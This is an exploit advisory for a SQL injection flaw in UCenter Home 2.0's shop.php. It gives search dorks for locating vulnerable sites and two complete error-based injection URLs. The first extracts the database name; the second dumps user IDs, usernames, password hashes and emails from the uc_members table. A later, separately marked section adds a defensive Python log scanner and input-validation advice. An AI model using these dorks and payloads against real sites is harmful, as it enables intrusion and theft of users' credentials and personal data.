__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okey.

You edit DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

You use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
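
Added example (not part of the original advisory, and not UCenter Home code): a defender-side Python check that scans web access-log lines for requests to shop.php?ac=view whose shopid is not a plain integer, and reports which fragments of the error-based payload quoted above appear in it. The log lines, function names and the 10-digit limit on a legitimate id are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target may contain raw spaces if the server logs it undecoded.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Lower-cased fragments of the error-based payload quoted in the advisory.
MARKERS = ("information_schema", "floor(rand(", "group by", "concat(", "uc_members")

def inspect_line(line):
    """Return None for a clean line, else (shopid value, matched markers)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes
    if params.get("ac", [""])[0] != "view":
        return None
    for value in params.get("shopid", []):
        # Assumption: a legitimate shop id is a short run of decimal digits.
        if not re.fullmatch(r"[0-9]{1,10}", value):
            folded = re.sub(r"\s+", " ", value.lower())
            return value, [mk for mk in MARKERS if mk in folded]
    return None

def scan(lines):
    """Return (line number, shopid value, markers) for every flagged line."""
    findings = []
    for number, line in enumerate(lines, 1):
        hit = inspect_line(line)
        if hit:
            findings.append((number, *hit))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2011:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201'
    '%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 731',
    '198.51.100.7 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253 and 1=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2011:10:00:12 +0000] "GET /index.php?ac=view&shopid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value, markers in scan(SAMPLE_LOG):
        print(f"line {number}: shopid={value!r} markers={markers}")
```

The digits-only test is the primary signal; the marker list only helps triage and will miss payloads that use different SQL constructs. The same rule applies server-side: treating shopid strictly as an integer before it reaches the query closes this class of injection.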